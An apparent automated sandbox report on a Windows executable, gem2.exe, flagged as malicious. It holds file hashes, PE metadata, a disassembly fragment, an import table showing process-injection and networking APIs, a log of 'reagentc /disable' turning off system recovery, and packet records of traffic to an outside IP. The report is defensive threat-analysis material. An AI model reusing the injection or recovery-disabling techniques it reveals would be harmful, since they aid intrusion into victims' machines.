                                                              SHA-512:36E7CF511786D417F5033B7F743211CEF995A6203C4E6DB22334F7721355A90AC4E21A118C67E3752B7BDEF82FCCB74BB978DC30D0E7BFCD69D14855DBE6D3AB
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........|../../../....../....u../....../....../....../......./....../../o../\...../\...../Rich../................PE..d......g.........."....*.^.....................@.............................p............`.................................................4....................J...........`..`....J..............................`I..@............p...............................text....].......^.................. ..`.rdata...\...p...^...b..............@..@.data...L<..........................@....pdata...J.......L..................@..@.reloc..`....`.......*..............@..B................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\ReAgentc.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1809
                                                              Entropy (8bit):4.309491540810431
                                                              Encrypted:false
                                                              SSDEEP:48:2BAB/BABJB2BbBSlB2TE5WHHBFKB4TBdABjMBABtB2:2BAB/BABJB2BbByB2QwHBcBeBdABoBAE
                                                              MD5:EF5FB45CE5DE2B2FF3E526B417F14463
                                                              SHA1:8E11D0C0E3A193122EA6B6E34B232E06D58CCEE1
                                                              SHA-256:0A23B1FBB9B67019606F3A254F0AD75426D24E9DD9DF3F6A31493B6212DEA913
                                                              SHA-512:2C6274E9D39EF6622AD889F9982E71772997E507126A6C967E8742FE678D6012D14CAE1AC4CAE7557DFBD2E52E4C4F2DD22FD923225708AA9D605E1AE95AAB13
                                                              Malicious:false
                                                              Preview:.2025-01-12 03:26:32, Info [ReAgentc.exe] ------------------------------------------------------..2025-01-12 03:26:32, Info [ReAgentc.exe] -----Executing command line: reagentc /disable-----..2025-01-12 03:26:32, Info [ReAgentc.exe] ------------------------------------------------------..2025-01-12 03:26:32, Info [ReAgentc.exe] Enter WinReUnInstall..2025-01-12 03:26:32, Info [ReAgentc.exe] Update enhanced config info is enabled...2025-01-12 03:26:32, Warning [ReAgentc.exe] Failed to get recovery entries: 0xc0000225..2025-01-12 03:26:32, Info [ReAgentc.exe] winreGetWinReGuid returning 0X490..2025-01-12 03:26:32, Info [ReAgentc.exe] ReAgentConfig::ReadBcdAndUpdateEnhancedConfigInfo WinRE disabled, WinRE Guid could not be determined (0x490) ..2025-01-12 03:26:32, Info [ReAgen
                                                              Process:C:\Windows\System32\ReAgentc.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (310)
                                                              Category:dropped
                                                              Size (bytes):50033
                                                              Entropy (8bit):4.883591528740043
                                                              Encrypted:false
                                                              SSDEEP:384:53Iq3Ie3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3II:5l7ljllllljjllllllllllljjl5T
                                                              MD5:A2113D90DE3D22986CA83D81ED189471
                                                              SHA1:EBA7076A8603F2D90D7584F0249BA42E5AF17B99
                                                              SHA-256:707E8D9A0AEE81DB57E605895BB2853ED56636CD1357887522D75CACCEB2569C
                                                              SHA-512:E254FD144FCBC1959E25793E93D9192BCFF77005529226906452E450BA640DA4DF823BC6E8D16F4954C9DA4A97550B0F9D737C44995F8374F8580546B5A62EBA
                                                              Malicious:false
                                                              Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                              Process:C:\Windows\System32\ReAgentc.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                              Category:modified
                                                              Size (bytes):51331
                                                              Entropy (8bit):4.919891102441454
                                                              Encrypted:false
                                                              SSDEEP:384:53Iq3Ir3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3IE:5lQljllllljjllllllllllljjlhVT
                                                              MD5:378D2339CE730B59DAF3F4B534CF2D73
                                                              SHA1:8A24942949EE8EA9C9A16FD0C61BEE5F66B8EF3F
                                                              SHA-256:503A491FC0E6CF7A760434BAB7C1214A8A720446C867B86E4EE2AC25FB159F2C
                                                              SHA-512:129D431005FC12C07B9DE03DA9D383BB7E5C9A2D4FD937F8D4AC4C15F0C656F3FBDCEC02D856A533170998BA01E031ECBD0FDD497354FD9B8D4B758BD80DE86D
                                                              Malicious:false
                                                              Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                              Process:C:\Windows\System32\ReAgentc.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):224
                                                              Entropy (8bit):4.6576199529314115
                                                              Encrypted:false
                                                              SSDEEP:3:92UQsKO8/FFORYxZaMJAvK/kFpdEJwHVDMUQVY3d/tXwD+/FFQBBcqxBLELY5t3i:Yus/4YxzJ/MPxVZCYt/tXp/4BNBAAy
                                                              MD5:6F6A8CEA820E8F0183AE75C157696C54
                                                              SHA1:03505147AA050C372B3ED030080F840CDF631755
                                                              SHA-256:47D913FD9D14718C135B91ECEFDC8AEC773D65BC53AC9834BA6BB0D0BEC9B55B
                                                              SHA-512:0694D2EF0D572833C348CD9F3A0285631F7B6C932A140A08329908BCC662A3345DE47A686AF8CDFFF6E44A89D6E5CB86FBA568E95078D62672E8AE68EDF2CDB9
                                                              Malicious:false
                                                              Preview:.2023-10-03 08:57:16, Error [msoobe.exe] COMMIT: failed for plugin LocalUser Plugin with hr=0x80070490..2025-01-12 03:26:32, Error [ReAgentc.exe] WinReUnInstall failed: : 0x2..
                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):538624
                                                              Entropy (8bit):6.311350325901448
                                                              Encrypted:false
                                                              SSDEEP:6144:9m2AOgAgbVYlfxTtR9HVOPeTEKybk5e6XJugmE8fpNj8Osc11gPbuAvZmeGzpwG:9mLOplfLHVOPeYceXE8Dx1gPbVv
                                                              MD5:BE89D598CD96443479C02B022FF70532
                                                              SHA1:F0AB69F56EBBBDDA791D61FD3D22476D61135871
                                                              SHA-256:A4C4487DCACEBF5048B2266233F5645CFE421154F26E6685CED36AA0621037F1
                                                              SHA-512:36E7CF511786D417F5033B7F743211CEF995A6203C4E6DB22334F7721355A90AC4E21A118C67E3752B7BDEF82FCCB74BB978DC30D0E7BFCD69D14855DBE6D3AB
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 53%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........|../../../....../....u../....../....../....../......./....../../o../\...../\...../Rich../................PE..d......g.........."....*.^.....................@.............................p............`.................................................4....................J...........`..`....J..............................`I..@............p...............................text....].......^.................. ..`.rdata...\...p...^...b..............@..@.data...L<..........................@....pdata...J.......L..................@..@.reloc..`....`.......*..............@..B................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Entropy (8bit):6.311350325901448
                                                              TrID:
                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                              • DOS Executable Generic (2002/1) 0.92%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:gem2.exe
                                                              File size:538'624 bytes
                                                              MD5:be89d598cd96443479c02b022ff70532
                                                              SHA1:f0ab69f56ebbbdda791d61fd3d22476d61135871
                                                              SHA256:a4c4487dcacebf5048b2266233f5645cfe421154f26e6685ced36aa0621037f1
                                                              SHA512:36e7cf511786d417f5033b7f743211cef995a6203c4e6db22334f7721355a90ac4e21a118c67e3752b7bdef82fccb74bb978dc30d0e7bfcd69d14855dbe6d3ab
                                                              SSDEEP:6144:9m2AOgAgbVYlfxTtR9HVOPeTEKybk5e6XJugmE8fpNj8Osc11gPbuAvZmeGzpwG:9mLOplfLHVOPeYceXE8Dx1gPbVv
                                                              TLSH:3DB44B5AA7A843F4E5B7E038C881511AF7B17496132197CF53A14AAB1F23BF19E3E710
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........|.../.../.../......./....u../......./......./......./......./......./.../o../\....../\....../Rich.../................PE..d..
                                                              Icon Hash:00928e8e8686b000
                                                              Entrypoint:0x14003d804
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x140000000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x678211C7 [Sat Jan 11 06:37:59 2025 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:2c0880db5251b34da206c7402f553df0
                                                              Instruction
                                                              dec eax
                                                              sub esp, 28h
                                                              call 00007FD10884B6E0h
                                                              dec eax
                                                              add esp, 28h
                                                              jmp 00007FD10884ACBFh
                                                              int3
                                                              int3
                                                              dec eax
                                                              mov eax, esp
                                                              dec eax
                                                              mov dword ptr [eax+08h], ebx
                                                              dec eax
                                                              mov dword ptr [eax+10h], ebp
                                                              dec eax
                                                              mov dword ptr [eax+18h], esi
                                                              dec eax
                                                              mov dword ptr [eax+20h], edi
                                                              inc ecx
                                                              push esi
                                                              dec eax
                                                              sub esp, 20h
                                                              dec ecx
                                                              mov ebx, dword ptr [ecx+38h]
                                                              dec eax
                                                              mov esi, edx
                                                              dec ebp
                                                              mov esi, eax
                                                              dec eax
                                                              mov ebp, ecx
                                                              dec ecx
                                                              mov edx, ecx
                                                              dec eax
                                                              mov ecx, esi
                                                              dec ecx
                                                              mov edi, ecx
                                                              dec esp
                                                              lea eax, dword ptr [ebx+04h]
                                                              call 00007FD10884AA7Dh
                                                              mov eax, dword ptr [ebp+04h]
                                                              and al, 66h
                                                              neg al
                                                              mov eax, 00000001h
                                                              inc ebp
                                                              sbb eax, eax
                                                              inc ecx
                                                              neg eax
                                                              inc esp
                                                              add eax, eax
                                                              inc esp
                                                              test dword ptr [ebx+04h], eax
                                                              je 00007FD10884AE53h
                                                              dec esp
                                                              mov ecx, edi
                                                              dec ebp
                                                              mov eax, esi
                                                              dec eax
                                                              mov edx, esi
                                                              dec eax
                                                              mov ecx, ebp
                                                              call 00007FD10884C585h
                                                              dec eax
                                                              mov ebx, dword ptr [esp+30h]
                                                              dec eax
                                                              mov ebp, dword ptr [esp+38h]
                                                              dec eax
                                                              mov esi, dword ptr [esp+40h]
                                                              dec eax
                                                              mov edi, dword ptr [esp+48h]
                                                              dec eax
                                                              add esp, 20h
                                                              inc ecx
                                                              pop esi
                                                              ret
                                                              int3
                                                              dec eax
                                                              mov dword ptr [esp+10h], ebx
                                                              dec eax
                                                              mov dword ptr [esp+18h], esi
                                                              push ebp
                                                              push edi
                                                              inc ecx
                                                              push esi
                                                              dec eax
                                                              mov ebp, esp
                                                              dec eax
                                                              sub esp, 10h
                                                              xor eax, eax
                                                              xor ecx, ecx
                                                              cpuid
                                                              inc esp
                                                              mov eax, ecx
                                                              inc esp
                                                              mov edx, edx
                                                              inc ecx
                                                              xor edx, 49656E69h
                                                              inc ecx
                                                              xor eax, 6C65746Eh
                                                              inc esp
                                                              mov ecx, ebx
                                                              inc esp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7bc34 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x81000 | 0x4a1c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0xd60 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x74aa0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x74960 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x67000 | 0x4b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x65d14 | 0x65e00 | 7f03217ee346ca28a1ec4edee2a16760 | False | 0.43878211273006135 | data | 6.370663514409348 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x67000 | 0x15c08 | 0x15e00 | 42e8f8aed5b347b2f1d36a093b6b6378 | False | 0.39369419642857145 | data | 4.885714304384146 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x7d000 | 0x3c4c | 0x1e00 | dda441d613f0add7fffe1ebe5ef127bc | False | 0.15091145833333333 | data | 3.6828671253130945 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x81000 | 0x4a1c | 0x4c00 | f7fb79d1bfbd6ff81ce784190fddd98b | False | 0.4654091282894737 | data | 5.619247766039834 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x86000 | 0xd60 | 0xe00 | 6a4fe1ef652ccf1d019f1ae70f1687f7 | False | 0.45926339285714285 | data | 5.393368661048187 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | GetCurrentProcess, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, ResumeThread, CreateProcessA, GetThreadContext, SetThreadContext, OpenProcess, GetWindowsDirectoryW, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory, IsWow64Process, Wow64GetThreadContext, Wow64SetThreadContext, GetModuleFileNameW, GetModuleHandleW, GetProcAddress, Sleep, Process32FirstW, Process32NextW, WriteConsoleW, CreateMutexW, WaitForSingleObject, GetProcessHeap, HeapFree, HeapAlloc, GetLastError, CloseHandle, WriteFile, ReadFile, GetFileSize, CreateFileW, CreateFileA, CreateDirectoryW, SetEnvironmentVariableW, GetEnvironmentVariableW, HeapSize, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, GetTimeZoneInformation, ReadConsoleW, CreateToolhelp32Snapshot, GetStdHandle, SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleOutputCP, QueryPerformanceCounter, QueryPerformanceFrequency, GetCurrentThreadId, WideCharToMultiByte, MultiByteToWideChar, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, GetSystemTimeAsFileTime, GetLocaleInfoEx, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, CompareStringEx, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, InitializeSListHead, RtlPcToFileHeader, RaiseException, RtlUnwindEx, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, HeapReAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, RtlUnwind
ADVAPI32.dll | RegCreateKeyExA, AllocateAndInitializeSid, CheckTokenMembership, EqualSid, RegGetValueA, RegSetValueExW, RegSetValueExA, RegOpenKeyExW, OpenProcessToken, RegCloseKey, GetTokenInformation, FreeSid
CRYPT32.dll | CryptStringToBinaryA
WININET.dll | InternetOpenA, InternetOpenW, InternetCloseHandle, InternetReadFile, HttpQueryInfoA, InternetCheckConnectionW, InternetOpenUrlA
WS2_32.dll | closesocket, connect, WSACleanup, getaddrinfo, freeaddrinfo, WSAStartup, socket
IPHLPAPI.DLL | GetAdaptersInfo
ole32.dll | CoInitializeEx, CoGetObject, CoUninitialize
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Jan 12, 2025 09:26:24.518203974 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.589312077 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.589359999 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.589426041 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.589476109 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.589514971 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.589559078 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.589586973 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.589633942 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610522985 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.610574007 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610622883 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.610671043 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610773087 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.610826969 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610889912 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.610943079 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.610980988 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.611037016 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.611377001 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.611438990 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.611449003 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.611500025 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.612045050 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.612096071 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.612152100 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.612210035 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.612932920 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.612993956 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.613020897 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.613075972 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.613657951 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.613708019 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.613754988 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.613809109 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.613842964 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.613900900 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.614484072 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.614538908 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.695601940 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.695677996 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.752856016 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.752935886 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.753021955 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.753081083 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.753123045 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.753171921 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.761567116 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.761667967 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.761698961 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.761706114 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.761768103 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.761768103 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.761862040 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.761914015 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.761936903 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.762048006 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.762098074 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.762198925 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.762253046 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.762527943 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.762598038 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.762602091 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.762625933 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.762651920 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.762674093 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.762933969 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.762981892 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.763041973 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.763089895 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.763123989 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.763166904 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.763245106 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.763297081 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.763423920 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.763478994 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.763509035 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.763565063 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.764221907 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.764276981 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.764318943 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.764372110 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.764420986 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.764463902 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.764494896 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.764549017 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.764578104 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.764628887 CET49727443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:24.766568899 CET44349727104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:24.766628027 CET49727443192.168.2.7104.21.60.172
